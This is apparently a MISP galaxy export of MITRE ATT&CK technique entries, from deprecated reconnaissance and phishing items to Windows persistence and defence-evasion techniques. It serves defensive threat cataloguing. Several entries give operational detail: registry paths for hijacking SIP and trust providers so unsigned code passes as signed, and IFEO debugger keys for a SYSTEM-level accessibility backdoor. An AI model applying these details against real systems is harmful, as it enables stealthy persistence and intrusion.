This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1365).

During production and distribution, the placement of software, firmware, or a CPU chip in a computer, handheld, or other electronic device that enables an adversary to gain illegal entrance. (Citation: McDRecall) (Citation: SeagateMaxtor)

The tag is: `misp-galaxy:mitre-attack-pattern="Hardware or software supply chain implant - T1365"`

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Test malware in various execution environments - T1357

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1357).

Malware may perform differently on different platforms (computer vs handheld) and different operating systems ([Ubuntu](http://www.ubuntu.com) vs [OS X](http://www.apple.com/osx)), and versions ([Windows](http://windows.microsoft.com) 7 vs 10) so malicious actors will test their malware in the environment(s) where they most expect it to be executed. (Citation: BypassMalwareDefense)

The tag is: `misp-galaxy:mitre-attack-pattern="Test malware in various execution environments - T1357"

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Conduct social engineering or HUMINT operation - T1376

This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. Human Intelligence (HUMINT) is intelligence collected and provided by human sources. (Citation: 17millionScam) (Citation: UbiquityEmailScam)
The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering or HUMINT operation - T1376"

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Spear phishing messages with malicious attachments - T1367

This technique has been deprecated. Please use [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).

Emails with malicious attachments are designed to get a user to open/execute the attachment in order to deliver malware payloads. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Spear phishing messages with malicious attachments - T1367"

Table 2955. Table References

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Authorized user performs requested cyber action - T1386

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Clicking on links in email, opening attachments, or visiting websites that result in drive by downloads can all result in compromise due to users performing actions of a cyber nature. (Citation: AnonHBGary)

The tag is: misp-galaxy:mitre-attack-pattern="Authorized user performs requested cyber action - T1386"

Table 2956. Table References

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Spear phishing messages with text only - T1368

This technique has been deprecated. Please use [Phishing](https://attack.mitre.org/techniques/T1566) where appropriate.

Emails with text only phishing messages do not contain any attachments or links to websites. They are designed to get a user to take a follow on action such as calling a phone number or wiring money. They can also be used to elicit an email response to confirm existence of an account or user. (Citation: Paypal Phone Scam)

The tag is: misp-galaxy:mitre-attack-pattern="Spear phishing messages with text only - T1368"

Table 2957. Table References

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Spear phishing messages with malicious links - T1369

This technique has been deprecated. Please use [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002).

Emails with malicious links are designed to get a user to click on the link in order to deliver malware payloads. (Citation: GoogleDrive Phishing) (Citation: RSASEThreat)

The tag is: misp-galaxy:mitre-attack-pattern="Spear phishing messages with malicious links - T1369"

Table 2958. Table References

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Unauthorized user introduces compromise delivery mechanism - T1387

This technique has been deprecated. Please use [Hardware Additions](https://attack.mitre.org/techniques/T1200) where appropriate.

If an adversary can gain physical access to the target’s environment they can introduce a variety of devices that provide compromise mechanisms. This could include installing keyboard loggers, adding routing/wireless equipment, or connecting computing devices. (Citation: Credit Card Skimmers)

The tag is: misp-galaxy:mitre-attack-pattern="Unauthorized user introduces compromise delivery mechanism - T1387"

Table 2959. Table References

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Modify OS Kernel or Boot Partition - T1398

If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device kernel or other boot partition components, where the code may evade detection, may persist after device resets, and may not be removable by the device user. In some cases (e.g., the Samsung Knox warranty bit as described under Detection), the attack may be detected but could result in the device being placed in a state that no longer allows certain functionality.

Many Android devices provide the ability to unlock the bootloader for development purposes, but doing so introduces the potential ability for others to maliciously update the kernel or other boot partition code.

If the bootloader is not unlocked, it may still be possible to exploit device vulnerabilities to update the code.

The tag is: misp-galaxy:mitre-attack-pattern="Modify OS Kernel or Boot Partition - T1398"

Table 2960. Table References

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Exploit via Charging Station or PC - T1458

If the mobile device is connected (typically via USB) to a charging station or a PC, for example to charge the device’s battery, then a compromised or malicious charging station or PC could attempt to exploit the mobile device via the connection(Citation: Krebs-JuiceJacking).

Previous demonstrations have included:

- Injecting malicious applications into iOS devices(Citation: Lau-Mactans).
- Exploiting a Nexus 6 or 6P device over USB and gaining the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device physical location(Citation: IBM-NexusUSB).
- Exploiting Android devices such as the Google Pixel 2 over USB(Citation: GoogleProjectZero-OATmeal).

Products from Cellebrite and Grayshift purportedly can use physical access to the data port to unlock the passcode on some iOS devices(Citation: Computerworld-iPhoneCracking).
Deliver Malicious App via Other Means - T1476

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.

Delivery methods for the malicious application include:

- [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) - Including the mobile app package as an attachment to an email message.
- [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.
- Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird)

Some Android malware comes with functionality to install additional applications, either automatically or when the adversary instructs it to.(Citation: android-trojan-steals-paypal-2fa)

The tag is: *misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476"*
Upload, install, and configure software/tools - T1362

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1362).

An adversary may stage software and tools for use during later stages of an attack. The software and tools may be placed on systems legitimately in use by the adversary or may be placed on previously compromised infrastructure. (Citation: APT1) (Citation: RedOctober)

The tag is: `misp-galaxy:mitre-attack-pattern="Upload, install, and configure software/tools - T1362"`

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Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.

The tag is: `misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003"`

Table 2964. Table References

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1225
LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001

By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)

Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)

Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoof) (Citation: GitHub Responder)

The tag is: **misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001"**

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<td><a href="https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution">https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution</a></td>
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</table>
Match Legitimate Name or Location - T1036.005

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.

Adversaries may also use the same icon of the file they are trying to mimic.

The tag is: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"

Table 2966. Table References

Links

https://attack.mitre.org/techniques/T1036/005
https://capec.mitre.org/data/definitions/177.html
https://twitter.com/ItsReallyNick/status/1055321652777619457
https://docs.docker.com/engine/reference/commandline/images/

Disable or Modify System Firewall - T1562.004

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.

Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004"

Table 2967. Table References

Links
Disable or Modify Cloud Firewall - T1562.007

Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004).

Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity. (Citation: Expel IO Evil in AWS)

Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify Cloud Firewall - T1562.007"

Table 2968. Table References

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<th><a href="https://attack.mitre.org/techniques/T1562/007">https://attack.mitre.org/techniques/T1562/007</a></th>
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<td><a href="https://expel.io/blog/finding-evil-in-aws/">https://expel.io/blog/finding-evil-in-aws/</a></td>
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SIP and Trust Provider Hijacking - T1553.003

Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPS July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)

Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to
mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)

- Modifying the `<code>Dll</code>` and `<code>FuncName</code>` Registry values in `<code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg{SIP_GUID}</code>` that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file's real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).

- Modifying the `<code>Dll</code>` and `<code>FuncName</code>` Registry values in `<code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData{SIP_GUID}</code>` that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file's computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.

- Modifying the `<code>DLL</code>` and `<code>Function</code>` Registry values in `<code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy \{trust provider GUID}</code>` that point to the DLL providing a trust provider's FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP's CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).

- **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)

The tag is: `misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1553.003"`

**Table 2969. Table References**

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<td><a href="https://msdn.microsoft.com/library/ms537359.aspx">https://msdn.microsoft.com/library/ms537359.aspx</a></td>
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Windows Management Instrumentation Event Subscription - T1546.003

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user logging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)

Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)

WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.

The tag is: `misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003"`

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<td><a href="https://www.secureworks.com/blog/wmi-persistence">https://www.secureworks.com/blog/wmi-persistence</a></td>
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Executable Installer File Permissions Weakness - T1574.005

Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the `<code>%TEMP%</code>` directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

The tag is: `misp-galaxy:mitre-attack-pattern="Executable Installer File Permissions Weakness - T1574.005"`

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<td><a href="https://seclists.org/fulldisclosure/2015/Dec/34">https://seclists.org/fulldisclosure/2015/Dec/34</a></td>
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**Path Interception by Unquoted Path - T1574.009**

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.

Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., <code>C:\unsafe path with space\program.exe</code> vs. <code>"C:safe path with space\program.exe"</code>). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is <code>C:\program files\myapp.exe</code>, an adversary may create a program at <code>C:\program.exe</code> that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)

This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.

The tag is: *misp-galaxy:mitre-attack-pattern="Path Interception by Unquoted Path - T1574.009"

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**Image File Execution Options Injection - T1546.012**

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application's IFEO will be prepended to the application's name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\NT\CurrentVersion\Image File Execution Options</code> where <code><executable></code> is the binary on which
the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOS can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in `<code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit</code>`. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)

Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.

Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)

The tag is: `misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012"`

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**Friend/Follow/Connect to targets of interest - T1344**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1344).

Once a persona has been developed an adversary will use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)

The tag is: `misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1344"`

Friend/Follow/Connect to targets of interest - T1344 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1364"` with estimative-language:likelihood-probability="almost-certain"

**Table 2974. Table References**

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**Friend/Follow/Connect to targets of interest - T1364**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1364).

A form of social engineering designed build trust and to lay the foundation for future interactions or attacks. (Citation: BlackHatRobinSage)

The tag is: `misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1364"

Friend/Follow/Connect to targets of interest - T1364 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1344"` with estimative-language:likelihood-probability="almost-certain"

**Table 2975. Table References**

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1234
Identify personnel with an authority/privilege - T1271

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1271).

Personnel internally to a company may have non-electronic specialized access, authorities, or privilege that make them an attractive target for an adversary. One example of this is an individual with financial authority to authorize large transactions. An adversary who compromises this individual might be able to subvert large dollar transfers. (Citation: RSA-APTRecon)

The tag is: 

```markdown
misp-galaxy:mitre-attack-pattern="Identify personnel with an authority/privilege - T1271"
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Receive KITs/KIQs and determine requirements - T1239

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1239).

Applicable agencies and/or personnel receive intelligence requirements and evaluate them to determine sub-requirements related to topics, questions, or requirements. For example, an adversary's nuclear energy requirements may be further divided into nuclear facilities versus nuclear warhead capabilities. (Citation: AnalystsAndPolicymaking)

The tag is: 

```markdown
misp-galaxy:mitre-attack-pattern="Receive KITs/KIQs and determine requirements - T1239"
```

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Identify job postings and needs/gaps - T1248

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1248).

Job postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on technologies within the organization which could be valuable in attack or provide insight in to possible security weaknesses or limitations in detection or protection mechanisms. (Citation: JobPostingThreat)
The tag is: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1248"

Identify job postings and needs/gaps - T1248 has relationships with:

- related-to: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1267" with estimative-language:likelihood-probability="almost-certain"
- related-to: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1278" with estimative-language:likelihood-probability="almost-certain"

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Analyze hardware/software security defensive capabilities - T1294

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1294).

An adversary can probe a victim’s network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: OSFingerprinting2014)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze hardware/software security defensive capabilities - T1294"

Table 2979. Table References

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Discover target logon/email address format - T1255

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1255).

Email addresses, logon credentials, and other forms of online identification typically share a common format. This makes guessing other credentials within the same domain easier. For example if a known email address is first.last@company.com it is likely that others in the company will have an email in the same format. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Discover target logon/email address format - T1255"

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Identify job postings and needs/gaps - T1267

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1267).

Job postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on people within the organization which could be valuable in social engineering attempts. (Citation: JobPostingThreat)

The tag is: `misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1267"

Identify job postings and needs/gaps - T1267 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1248"` with estimative-language:likelihood-probability="almost-certain"
- related-to: `misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1278"` with estimative-language:likelihood-probability="almost-certain"

Table 2981. Table References

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Identify job postings and needs/gaps - T1278

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1278).

Job postings, on either company sites, or in other forums, provide information on organizational structure, needs, and gaps in an organization. This may give an adversary an indication of weakness in an organization (such as under-resourced IT shop). Job postings can also provide information on an organizations structure which could be valuable in social engineering attempts. (Citation: JobPostingThreat) (Citation: RSA-APTRecon)

The tag is: `misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1278"

Identify job postings and needs/gaps - T1278 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1267"` with estimative-language:likelihood-probability="almost-certain"
- related-to: `misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1248"` with estimative-language:likelihood-probability="almost-certain"
**Analyze organizational skillsets and deficiencies - T1300**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1300).

Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)

The tag is: `misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1300"`

Analyze organizational skillsets and deficiencies - T1300 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1297"` with estimative-language:likelihood-probability="almost-certain"
- related-to: `misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1289"` with estimative-language:likelihood-probability="almost-certain"

**Exfiltration Over Other Network Medium - T1011**

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.

Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

The tag is: `misp-galaxy:mitre-attack-pattern="Exfiltration Over Other Network Medium - T1011"`
Network Traffic Capture or Redirection - T1410

An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.

A malicious app could register itself as a VPN client on Android or iOS to gain access to network packets. However, on both platforms, the user must grant consent to the app to act as a VPN client, and on iOS the app requires a special entitlement that must be granted by Apple.

Alternatively, if a malicious app is able to escalate operating system privileges, it may be able to use those privileges to gain access to network traffic.

An adversary could redirect network traffic to an adversary-controlled gateway by establishing a VPN connection or by manipulating the device's proxy settings. For example, Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by installing a malicious iOS Configuration Profile.

If applications encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.

The tag is: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410"

Table 2985. Table References

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Determine 3rd party infrastructure services - T1260

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1260).

Infrastructure services includes the hardware, software, and network resources required to operate a communications environment. This infrastructure can be managed by a 3rd party rather than being managed by the owning organization. (Citation: FFIECAwareness) (Citation: Zetter2015Threats)

The tag is: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1260"

Determine 3rd party infrastructure services - T1260 has relationships with:

- related-to: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1284" with estimative-language:likelihood-probability="almost-certain"

Table 2986. Table References

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Analyze presence of outsourced capabilities - T1303

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1303).

Outsourcing, the arrangement of one company providing goods or services to another company for something that could be done in-house, provides another avenue for an adversary to target. Businesses often have networks, portals, or other technical connections between themselves and their outsourced/partner organizations that could be exploited. Additionally, outsourced/partner organization information could provide opportunities for phishing. (Citation: Scasny2015) (Citation: OPM Breach)

